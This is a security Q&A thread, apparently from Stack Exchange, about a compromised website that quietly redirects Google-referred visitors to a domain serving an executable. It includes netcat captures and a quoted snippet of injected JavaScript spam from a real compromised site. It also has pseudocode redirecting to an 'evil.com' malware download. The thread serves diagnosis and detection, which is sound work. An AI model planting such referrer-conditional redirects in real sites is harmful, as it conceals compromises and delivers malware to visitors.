5

I found something very suspicious. When connecting to www.pulseexpress.com following a Google link, the server redirects you to some very dubious site that sends you a .exe file right away:

# host www.pulseexpress.com
www.pulseexpress.com has address 173.236.189.124

# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDEQFjAA&url=http%3A%2F%2Fwww.pulseexpress.com%2F&ei=JfhkT_SuGYf40gG85MW_CA&usg=AFQjCNGlomNN7JWxEG7DUzbJyqnVFYkj7w&sig2=i5xsJPgIs1sbD6gpDzJ7OQ

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Mar 2012 20:53:40 GMT
Server: Apache
Location: http://www.fdvrerefrr.ezua.com/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html

However, if you enter the address right into your browser, content is served normally:

# netcat 173.236.189.124 80
GET / HTTP/1.1
Host: www.pulseexpress.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101
Firefox/10.0.2 Iceweasel/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sat, 17 Mar 2012 20:53:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: e7c55e1c7796b5e5c04e0c55afd862ea=e427sf2eh4t11jno5c4pvaal40;
path=/
Set-Cookie: virtuemart=e427sf2eh4t11jno5c4pvaal40
Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 07-Mar-2013 20:53:53
GMT; path=/
Last-Modified: Sat, 17 Mar 2012 20:53:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4428
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
[...]

To me this looks like the server has been compromised. Also, the attack seems to have been non-trivial, as the Apache configuration must have been modified in such a way that only some requests are redirected - probably to make it less likely for the owner to notice the problem.

Do people agree with that analysis?

Is this conditional redirection technique something new and hand-crafted, or is this a routine procedure included in standard attack software suites?

AviD
  • 72,138
  • 22
  • 136
  • 218
Nikratio
  • 153
  • 3

2 Answers2

3

The short answer. Yes, this kind of conditional redirection based upon the referer is routine.

Details. I have typically seen this implemented by putting some Javascript on the page to check the document.referrer. I hadn't previously seen it implemented in the Apache server configuration, but this is a natural evolution of the existing practice, so it is not too surprising to me.

More information. SANS has an excellent article on the subject and on how to protect yourself. One suggestion is to set up a standing Google search, limited to your site (site:yoursite.com) and listing some keywords that attackers might introduce, and see if it spots anything. That wouldn't have detected the particular attack you mention, but it would help with related attacks. See the article for a suggested Google Alert you can use.

Reporting malicious sites. For future reference, you can report malicious/compromised web sites to Google and Microsoft via various online web forms, to protect other users who may try to browse to those sites in the future. I took the liberty of reporting both sites to Google, but you may want to do the same, too, and report it to Microsoft as well if you use IE. I can't seem to download the .exe file any longer, but if you saved the .exe, you can also report it online to various anti-virus vendors.

Sample exploit code. For instance, here is an example snippet from a compromised website (real live code, not made up):

<script type="text/javascript">
if(document.referrer.toUpperCase().indexOf("CIALIS") != -1)
{
    document.getElementById('hMenu').innerHTML = "<h1
    align=\"center\">Cialis 10mg</h1> [...] ";
}
</script>

In your case, the attack seems to be done by compromising the Apache configuration or installation rather than by inserting Javascript on the page, but I thought you might find this interesting anyway.

D.W.
  • 98,420
  • 30
  • 267
  • 572
1

This stuff happens pretty often and it's easy to setup.

If referer contains `google`:
redirect to `evil.com/steal_all_your_private_stuff.exe`

They do it's this way to hide the fact the server has been compromised.

A first try to detect such a backdoor would be grep google -irn /var/www/

sfx
  • 903
  • 7
  • 14